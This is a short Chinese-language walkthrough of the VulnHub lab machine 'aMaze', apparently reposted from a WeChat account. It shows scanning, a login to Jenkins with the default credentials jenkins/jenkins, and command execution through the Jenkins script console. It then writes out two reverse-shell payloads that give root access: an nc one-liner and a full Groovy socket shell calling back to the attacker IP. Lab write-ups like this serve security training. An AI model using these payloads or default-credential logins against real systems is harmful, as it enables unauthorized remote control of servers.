下载地址:https://download.vulnhub.com/amaze/aMaze.ova
攻击者IP:192.168.56.132 桥接(自动) vmare
受害者IP:192.168.56.154 仅主机 vxbox
主机发现
arp-scan -I eth1 -l
端口扫描
Jetty 是一个开源的 Java Web 服务器和 Servlet 容器,广泛用于开发和托管 Java 应用程序和服务。
21端口支持anonymous,但是里面是空的
web主页直接403
目录扫描发现登录口
sql注入,暴力破解都没成功
5000端口的jenkins使用弱口令进入系统
jenkins/jenkins
查看版本
查看漏洞
反弹失败
系统管理找到脚本命令行
可以直接执行root命令
println "id".execute().text
反弹shell直接获得root权限
println "nc 192.168.56.132 1111 -e /bin/bash".execute().text
方法2
https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76#file-revsh-groovy
String host="192.168.56.132";int port=2222;String cmd="/bin/bash";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
原文始发于微信公众号(王之暴龙战神):AMAZE_1
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论